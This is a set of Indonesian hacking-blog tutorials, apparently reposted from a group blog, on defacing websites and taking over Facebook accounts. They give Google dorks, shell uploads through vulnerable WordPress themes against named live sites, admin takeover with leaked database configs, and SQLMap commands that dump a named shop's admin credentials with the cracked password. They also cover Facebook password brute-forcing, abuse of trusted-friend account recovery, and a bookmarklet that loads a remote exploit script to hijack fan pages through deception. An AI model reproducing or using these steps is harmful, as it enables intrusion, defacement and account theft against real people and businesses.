PhUploader File Upload Vulnerable

oke langsung mulai aja ya

Dork :
inurl:"phUploader.php" intext:.txt
intitle:"Powered By phUploader"  intext:.txt

masukan salah satu dork kedalam mesin pencaharian google. contoh lihat gambar dibawah.

 Pilih salah satu link disitu , saya pilih yang http://www.bizarremart.com/pix/pix.php

 upload gambar yang berformat .txt (isikan tulisan. Hacked By Nick Kamu )

 pilih filenya . jika sudah Open > Upload File(S) .

 taraaaa , jika sudah seperti gambar diatas

Happy Defacing.,.,.

Author : Zombierss

Read More

wordpress themes store vuln (shell upload) + video

Dork :
inurl:/wp-content/themes/WPStore
inurl:/wp-content/themes/eShop
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/Emporium
inurl:/wp-content/themes/Store
inurl:/wp-content/themes/eCommerce
inurl:/wp-content/themes/framework

Oke kita mulai masukan salah satu dork diatas kedalam mesin pencaharian google. oke lihat gambar dibawah.
saya ambil dork yang inurl:/wp-content/themes/framework

pilih salah satu website yang ada disitu. saya ambil live target http://www.compareukprice.com/wp-content/themes/framework/upload/
Exploit : www.site.com/wp-content/themes/TYPESTORE/upload

upload file Pilih Berkas , upload shell ya jangan upload photo

pilih salah satu shell kamu seperti gambar diatas

tunggu sampai proses loading selesai , kalau loading tidak selesai-selesai tinggalkan saja web itu

jika sudah , proses loadingnya akan hilang , seperti gambar diatas
jika semua proses diatas sudah selesai kamu bisa langsung akses shell kamu.

di
www.site.com/wp-content/uploads/products_img/NAMASHELLKAMU.typefile
atau
www.site.com/wp-content/uploads/TAHUNUPLOADKAMU/BULANUPLOADKAMU/NAMASHELLKAMU.typefile

contoh :

http://www.compareukprice.com/wp-content/uploads/products_img/shell7.php Hasil dari live target

Read More

Deface Dengan Config

Selamat malam sobat  :D langsung aja sekarang mau kasih cara deface dengan config :D

 

Bahan - Bahan :

1. MySQL Interface | Download

2. Web Config

3. Video Tutorial | Download

Disini saya tidak akan membahas bagai mana mencari config dalam web, sobat bisa lihat di artikel Cara Mencari Config Dalam Website :)

Pertama silahkan sobat buka Link yang berisikan config :)

Config CMS Wordpress

Pilih salah satu config database CMS Worpress 

Masukkan Username Dan Passwordnya  ke My SQL Interface Lalu Login  :)

Kemudian Pilih kolom ke 2 lalu klik Tables

Setelah itu pada kolom wp_users  klik Data

Disini kita akan mengubah passwordnya, Klik Edit

Lalu ubah passwordnya dengan password kamu, disini saya mengubah passwordnya "12345" dan di encrypt ke type MD5 menjadi "827ccb0eea8a706c4c34a16891f84e7b" untuk encrypt password disini

Lalu klik Edit Data untuk menyimpan perubahan. dan Silahkan sobat Loggin ke halaman login website :) kalo di CMS wordpress halaman loginnya berada:

http://sitetarget.com/wp-login.php

http://sitetarget.com/path/wp-login.php

Selanjutnya tinggal Tanem Shell di web tersebut, sobat bisa lihat Disini

Config CMS Joomla

Pilih salah satu config CMS Joomla :)

Masukkan Username Dan Passwordnya  ke My SQL Interface Lalu Login  :)

Kemudian Pilih kolom ke 2 lalu klik Tables

Setelah itu pada kolom jos_users  klik Data

Disini kita akan mengubah passwordnya, Klik Edit

Lalu ubah passwordnya dengan password yg sobat inginkan, disini saya mengubah passwordnya "12345" dan di encrypt ke type MD5 menjadi "827ccb0eea8a706c4c34a16891f84e7b" untuk encrypt password disini

Lalu klik Edit Data untuk menyimpan perubahan. dan Silahkan sobat Loggin ke halaman login website :) kalo di CMS Joomla halaman loginnya berada:

http://sitetarget.com/administrator

http://sitetarget.com/path/administrator

Selanjutnya tinggal Tanem Shell di web tersebut, sobat bisa lihat Disini

Selamat Mencoba, :) Semoga Bermanfaat :)

Sumber: http://indocyberarmy.blogspot.com/2013/01/deface-dengan-config.html#ixzz2TR0HGAxz

Read More

Cara Deface Web Dengan WPStore Themes Uploader

 Kali ini kita akan melakukan aksi deface terhadap webshop (web perbelanjaan), jadi jika anda beruntung anda bisa mendapatkan CC (Credit Card).

Ok, kali ini cara yang kita gunakan yaitu mengupload shell kita dengan exploit

1. Masukkan dork ini ke kotak pencarian google inurl:/wp-content/themes/WPstore/

2. Pilih salah satu dari hasil penelusuran

3. Masukkan exploit berikut /wp-content/themes/WPStore/upload/
Contoh: www.site.com/wp-content/themes/WPStore/upload/

4. Nanti akan muncul tampilan berikut

Anda klik "pilih file" untuk mengupload shell anda.

5. Tunggu beberapa saat

6. Jika shell sudah tertanam, anda buka shell anda dengan cara membuka url'nya
Contoh: www.site.com/wp-content/uploads/products_img/shell.php

7. Anda hanya tinggal eksekusi saja, cari file index.php / index.html nya lalu rubah isinya dengan script deface anda

Semoga bermanfaat ^_^

Read More

Tool Hack Akun Facebook 2013

Assalamualaikum...

Nih ane punya aplikasi hack facebook (kata org2 :3) yg bisa sobat gunakan untuk menemukan password dari akun facebook orang lain :D caranya penggunaaanya sangat mudah dan simple aja kok,, yuk disimak :D untuk pengguna windows, disarankan untuk melengkapin bahan2 yg telah dilampirkan agar aplikasi tersebut bisa berjalan dengan baik :) dan sebelumnya tools ini sudah ane coba, dan masih work 100% :D

UPDATE : Not Working on Windows XP :p

Bahan - Bahan

1. Python 2.7 | Download

2. Aplikasi Hack Facebook | Download Password: Lihat

3. Wordlist | Download 

4.Mechanize | Baca bagian bawah! :p

Langkah - Langkah

Download dulu bahan2 lalu install Python 2.7 nya, kemudian extract file tool hack FB nya, kalo ane di extract di partisi D:\

Kemudian buka terminal sobat dan masuk ke directori D:\facebook

Setelah itu jalankan toolnya dengan cara ketik facebook.py lalu enter! masukkan email/username akun facebook target lalu enter! trus masukin juga nama file password list yg isinya merupakan kumpulan dari kombinasi kata, huruf dan angka, lalu enter!

Sekarang tinggal nunggu hasilnya, lama prosesnya tergantung dari banyaknya wordlist yg digunakan! kalo punya ane cuma 1GB, jadi sekitar beberapa menit menit aja :D

Setelah menunggu beberapa saat, ketemu dah passwordnya :D

Nah tinggal Login aja ke Facebooknya :D

Akun ini milik Onix AQua

Udah yaa, Selamat mencoba aja.. Goodluck!! :D


kalo seandainya sobat meengalami error saat menjalankan toolsnya, silahkan install Mechanize! Download disini! cara installnya via terminal masuk dulu ke directori mechanize, lalu ketik perintah : setup.py install lalu enter! liat gambar!

Note: " Semakin banyak wordlistnya semakin bagus :D karna cara kerja tools ini menebak password berdasarkan wordlist yg tersedia, usahakan buat wordlistnya se unik mungkin utk hasil yg lebih maksimal :D "

Sekian tutorial singkat dari ane, mudah2an bermanfaat yah :p

Sumber: http://indocyberarmy.blogspot.com/2013/04/tool-hack-akun-facebook.html#ixzz2TFWegUFv

Read More

Deface Dengan SQLMAP di Backtrack 5

Assalamualaikum Wr, WB,

maaf yah om om sekalian, ane lama gak buat threat baru, nah sekarang mumpung ada waktu ane share nih cara deface website dengan SQLMAP di Backtrack 5 :D

Apa itu SQLMap ?


SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

[+} BAHAN [+]

• Python [windows download]
• Sqlmap [windows download]

[+] LANGKAHNYA MAS BRO [+]

(*Untuk Windows kalian cari dulu ke sini )

1. Kita cari dulu target yang mau kita scan (*jika ada bugs akan seperti ini)

2. Buka dulu SQLMAPnya, kalo di Backtrack 5 ketikan printah

• /pentest/web/scanners/sqlmap /

3. Ketikan printah ini :

• 
  
• python ./sqlmap.py -u http://www.BUGWEBTARGET.com --dbs

Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs

setelah itu klik enter, maka akan muncul Database Target (*See Image)

4. Setelah dapet nama Data Basenya kita ketikan printah :

• python ./sqlmap.py -u http://TARGET.com -D nama_database -tables

Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables  [tekan enter] hasil :

5. Setelah dapat table pada databasenya silahkan cari table yang menurut kalian ada USER + PASS website tersebut, kali ini saya coba scan TABLE USER, dengan perintah :

• 
  
• python ./sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns

Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns [lalu tekan ENTER] maka hasilnya akan seperti ini : 

6. Setelah itu kita scan lagi table itu untuk mendapatkan user dan pass admin website, dengan perintah :

• 
  
• python ./sqlmap.py -u http://www.target.com -D nama_database -T table --dump

Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump [tekan ENTER]

Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip"

• do you want to crack them via a dictionary-based attack? [Y/n/q] maka hasilnya :

nah itu kita dapetin User + Passwordnya :D

User : admin

Pass : dfc560ef836a9a63c2bdbfb24a683624

Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :

• Tujuan Pertama
• Tujuan Kedua
• Tujuan Ketiga
• Tujuan Keempat
• Tujuan Keenam

Nah setelah saya Decrypt ane dapetin nih :

Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$

Sekarang tinggal login ke admin dan tebas deh :D

http://www.vana-shop.com/admin/

HASIL : 

masih kena deface tuh : http://www.vana-shop.com/

dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD

Semoga berhasil :)

Sumber: http://indocyberarmy.blogspot.com/2013/04/deface-dengan-sqlmap-di-backtrack-5.html#ixzz2TFVOYMO8

Read More

Hack Facebook Menggunakan Trik 3 Teman Terpercaya

Assalamualaikum...

Sobat, saatnya bilang wow? Tunggu dulu sebelum sobat mencoba trik ini.. :p

langsung ke topik,, hehehe :D

Trik ini mudah saja, semua orang bisa melakukannya :p

yang diperlukan adalah sobat harus memiliki beberapa akun facebook minimal tiga, tapi baiknya lebih dari 3 ;) buat saja akun facebook yang bnyak.. hehehehe dan usia akun facebook itu harus lebih dari 7 hari, kalo masih baru trik ini ga kan bekerja.. :p klo sudah punya beberapa akun, langsung saja berteman dengan target ;)jangan lupa, siapkan juga email yg baru.. ;)

ini langkah2nya :

1. buka facebook.com. lalu klik forgot password / Lupa Password

2. lalu masukkan email atau username target.. klik search!

3. kalo udah ketemu akun target? klik aja "Ini Akun saya"

4. lalu pilih "Tidak lagi memiliki Akses ke sini"

5. masukkan email yg telah disiapkan sobat tadi..

6.  kemudian ada perintah untuk menjawab pertanyaan. jawab aja salah jg gpp ;)

7. saatnya memilih 3 akun palsu yg kita buat sebelumnya.. klik "Selanjutnya" lalu pilih 3 teman, disini pilihlah 3 teman yaitu beberapa facebook palsu yg sobat persiapkan sebelumnya ;)

8. lalu facebook akan mengirimkan kode keamanan ke 3 akun tadi,, kumpulkan kodenya lalu masukkan.. baiknya gunakan browser lain utk membuka 3 akun palsu sobat.. ;)

9. setelah itu facebook akan mengirimkan "Password Recovery Email" atau Pemulihan akun ke email sobat tadi.. tinggal buka email, dan reset pasasword facebooknya.

10. tarrraaa.. facebook udah bisa sobat kuasai.. :p

Note: Sobat akan menemukan sedikit perbedaan  dalam trik ini pada saat mencobanya, jadi gunakan pikiranmu untuk mengembangkannya lagi.. :p

Sekian Terimakasih ;)

Sumber: http://indocyberarmy.blogspot.com/2013/02/hack-facebook-menggunakan-trik-3-teman.html#ixzz2TExWh5Aj

Read More

Hack Fans Page Facebook

Selamat pagi aja,, salam berbagi..

Sekarang saya mau share sedikit tentang trik bagaimana cara hack fanspage. tapi sebelumnya saya tekankan bahwa "Akun facebook / Fanspage itu bisa di hack karna factor Human Error"..

oke langsung saja deh.. :)


Hal-hal yang perlu dipersiapkan:

1. Fanspage Exploit Download  Password: Lihat

2. Hostingan Gratis (idhostinger,nazuka,dll)

3. Script Untuk Menjalankan Exploit

4. Email ID Facebookmu

5. Gunakan Otak (Pintar2) ;)


Langkah-Langkah:

1. Edit exploit.js dengan notepad. cari bagian email ID, lalu ganti dengan email ID mu.. lalu save!

2. Buatlah Hostingan di hosting gratis, Silahkan baca Cara Membuat Hoting lalu upload exploit.js dan pastikan upload di public_html.. http://sitekamu.hostingan.com/exploit.js

3. Script untuk menjalankan Exploit.js yg sudah diupload di hostingan

javascript:(a = (b = document).createElement(“script”)).src = “http://sitekamu.hostingan.com/exploit.js“, b.body.appendChild(a); void(0)

Sekarang kamu hanya butuh mengirimkan kode Script itu kepada Admin page agar mau menjalankan kode script itu di halaman fanspagenya dengan mengkopy kode script lalu dipastekan di adressbar browser.  katakan saja ini Autolike Fanspage atau terserah gimana caranya membodohinya.. wkwkwk :p

Saran saja,, sebaiknya dicoba2 dulu karena saya tidak jamin exploit itu masih bekerja. mengingat sistem keamanan facebook yang terus diperketat.

sekian, terimakasih

Read More

Deface Dengan CSRF (Cross Site Request Forgery)

Assalamualaikum :)


Bahan-Bahan:

1. Download Script CSRF
===============================================================
DOWNLOAD DISINI  Password: Lihat
===============================================================
Note: Aktifkan Java Script untuk download!!

2. Download MadspotShell Disini Extract dulu dari file Rar!

3. Cari target dengan DORK :

• inurl:/wp-content/themes/shepard
• inurl:/wp-content/themes/money
• inurl:/wp-content/themes/clockstone
• inurl:/wp-content/themes/ambleside
• inurl:/wp-content/themes/pacifico

#Dork dikembangkan sendiri ya :)

4. Untuk coba2 gunakan Live Target & Live Target 2

5. Great Thanks To om Edo aka Mr. Goodday aka 007 Yg udh ngajarin :D

6. Titip Nama :: Indonesian Cyber Army ( IDCA ) | Stealth Defacer Hacking Team (SDHT)

#Persiapan sudah selesai, sekarang tinggal kita eksekusi :)

7. Download Video Tutorial | Pass : onixidca

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah- Langkah:

1. Masukan Dork ke dalam google (kurang jelas lihat gambar)

2. Pilih salah satu target yang kita dapat tadi (Kurang jelas lihat gambar)

Contoh :

http://www.robertcarpentry.com/wp-content/themes/pacifico/images/ ganti menjadi http://www.robertcarpentry.com/wp-content/themes/pacifico/theme

3. Klik folder "Function" lalu klik file "Upload-bg.php" / "uploadbg.php" / "upload.php"

Note: Jika muncul "You Must Login....."atau blank? cari target lain!! :p  "Jika muncul "error" berarti Web target Vulnerable" ;p

4. Buka file CSRF.html yang tadi sudah di download dengan notepad, ganti URLTARGET  dengan link yang berada di addres bar target kamu tadi. Lihat Gambar! lalu save!

Contoh: "http://www.robertcarpentry.com/wp-content/themes/pacifico/theme/functions/upload-bg.php"

5. Buka file CSRF.html, akan muncul upload file. lalu Pilih Madspotshell.php lalu klik upload .

Jika berhasil maka akan muncul seperti ini (lihat gambar)

6. Udah diganti ? dan jika berhasil maka tampilannya akan jadi seperti ini

#itu tandanya shell backdoor kamu sudah terpasang :D sekarang terserah mau kamu apain website itu :)

#Saya menggunakan SHELL dari teman saya om X Inject :D (tampilan shell akan berbeda beda loh setiap jenisnya)

Tampilan madspotshell::

7. Untuk eksekusi Index, silahkan lihat Cara Tebas Index Website Wordpress

Sekian tutor yang dapat saya berikan :)

kalo kurang jelas, boleh tanya kan pada ORANG CAKEP INI XD

Sumber: http://indocyberarmy.blogspot.com/2013/02/deface-dengan-csrf-cross-site-request.html#ixzz2TEu3Rp4U

Read More